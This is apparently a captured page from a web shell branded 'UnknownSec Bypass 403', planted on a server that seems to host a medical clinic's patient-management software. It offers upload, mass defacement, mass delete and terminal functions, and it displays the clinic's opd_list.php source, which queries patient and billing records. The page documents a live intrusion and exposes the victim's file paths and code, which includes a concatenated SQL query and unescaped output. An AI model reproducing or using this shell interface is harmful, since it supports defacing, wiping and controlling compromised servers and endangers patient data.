UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
opd_list.php
<?php include "top1.php";?> <!-- /inner_content--> <div class="inner_content"> <!-- /inner_content_w3_agile_info--> <!-- breadcrumbs --> <div class="w3l_agileits_breadcrumbs"> <div class="w3l_agileits_breadcrumbs_inner"> <ul> <li><a href="dashboard.php">Dashboard</a><span>«</span></li> <li>Patient List</li> </ul> </div> </div> <!-- //breadcrumbs --> <div class="inner_content_w3_agile_info two_in"> <table width="100%"> <tr> <td width="70%"> <h2 class="w3_inner_tittle">PATIENT LIST</h2> </td> <td width="30%" align="right"><a href="opd.php" class="btn btn-primary"><i class="fa fa-plus"></i> Add New Patient</a></td> </tr> </table> <!--/forms--> <table id="example1" class="table table-striped table-bordered"> </table> <div class="forms-main_agileits"> <div class="form-body" style="overflow-x:auto;"> <?php $sql= "Select DATE_FORMAT(opddate,'%d-%m-%Y') as opddate ,doctorpatientcount,suhid,fileno,sfileno,name,examinedby, DATE_FORMAT(expirydate,'%d-%m-%Y') as expirydate ,amount,discount,netamount,receiveamt from v_patientdetails where isdeleted=0 and financialyearid='".$_SESSION['financialyearid']."' order by sfileno DESC Limit 100"; $result=mysqli_query($conn, $sql) or die("Query Failed."); if (mysqli_num_rows($result)>0) { ?> <table id="studtable" class="table table-striped table-bordered"> <thead> <tr> <th>No.</th> <th>Date</th> <th>S.No.</th> <th>UHID</th> <th>File No.</th> <th>Name</th> <th>Examined by</th> <th>Expiry Date</th> <th>Amount</th> <th>Discount</th> <th>Net Amt</th> <th>Receive Amt</th> <th>Edit/Print</th> <th></th> </tr> </thead> <tbody> <?php $serial= 1; while ($row = mysqli_fetch_assoc($result)) { ?> <tr> <td><?php echo $serial ?> </td> <td><?php echo $row['opddate']; ?> </td> <td> <?php echo $row['doctorpatientcount']; ?> </td> <td> <?php echo $row['suhid']; ?> </td> <td> <?php echo $row['sfileno']; ?> </td> <td> <?php echo $row['name']; ?> </td> <td> <?php echo $row['examinedby']; ?> </td> <td> <?php echo $row['expirydate']; ?> </td> <td> <?php echo $row['amount']; ?> </td> <td> <?php echo $row['discount']; ?> </td> <td> <?php echo $row['netamount']; ?> </td> <td> <?php echo $row['receiveamt']; ?> </td> <td align="center"> <div class="dropdown1" align="left"> <span style="color:green"><i class="glyphicon glyphicon-pencil"></i> | <i class="glyphicon glyphicon-print"></i></span> <div class="dropdown-content1"> <p> <a href='opd.php?id=<?php echo $row["fileno"]; ?>&op=<?php echo "Update"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Edit</a></p> </br> <p> <a href='print_letterhead.php?id=<?php echo $row["fileno"]; ?>'><i class=" glyphicon glyphicon-print"></i> Letter Head</a></p> </br> <p><a href='print_receiptnew.php?id=<?php echo $row["fileno"]; ?>'><i class=" glyphicon glyphicon-print"></i> Receipt</a></p> </br> <p> <a href='followup.php?id=<?php echo $row["fileno"]; ?>&op=<?php echo "Follow Up"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Follow Up</a></p> </br> <p> <a href='newrefund.php?id=<?php echo $row["fileno"]; ?>&op=<?php echo "Refund"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Refund</a></p> </div> </div> </td> <td><a href='opd.php?id=<?php echo $row["fileno"]; ?>&op=<?php echo "Delete"; ?>'> <i class="glyphicon glyphicon-trash"></i></a> </td> </tr> <?php $serial++; } } ?> </tbody> </table> </div> </div> </div> <!-- //inner_content_w3_agile_info--> </div> <!-- //inner_content--> </div> <!-- banner --> <!-- //inner_content--> <style> .dropdown1 { position: relative; display: inline-block; } .dropdown-content1 { display: none; position: absolute; background-color: #f9f9f9; min-width: 160px; box-shadow: 0px 8px 16px 0px rgba(0, 0, 0, 0.2); padding: 12px 16px; z-index: 1; } .dropdown1:hover .dropdown-content1 { display: block; } </style> <head> <link href="style.css" rel="stylesheet" type="text/css" /> <script src="vendor/jquery/jquery-3.2.1.min.js" type="text/javascript"></script> <link rel="stylesheet" href="vendor/DataTables/jquery.datatables.min.css"> <script src="vendor/DataTables/jquery.dataTables.min.js" type="text/javascript"></script> <link rel="stylesheet" href="vendor/DataTables/buttons.datatables.min.css"> <script src="vendor/DataTables/dataTables.buttons.min.js" type="text/javascript"></script> <script src="vendor/DataTables/jszip.min.js" type="text/javascript"></script> <script src="vendor/DataTables/pdfmake.min.js" type="text/javascript"></script> <script src="vendor/DataTables/vfs_fonts.js" type="text/javascript"></script> <script src="vendor/DataTables/buttons.html5.min.js" type="text/javascript"></script> </head> <script type="text/javascript"> $(document).ready(function() { $("#studtable").DataTable({ bLengthChange: true, "iDisplayLength": 10, bInfo: false, responsive: true, "bAutoWidth": false, dom: 'lBfrtip', buttons: [{ extend: 'copy', attr: { id: 'allan' } }, 'csv', 'excel', 'pdf'] }); }); </script> <?php include "footer.php";?>
Copyright © 2025 - UnknownSec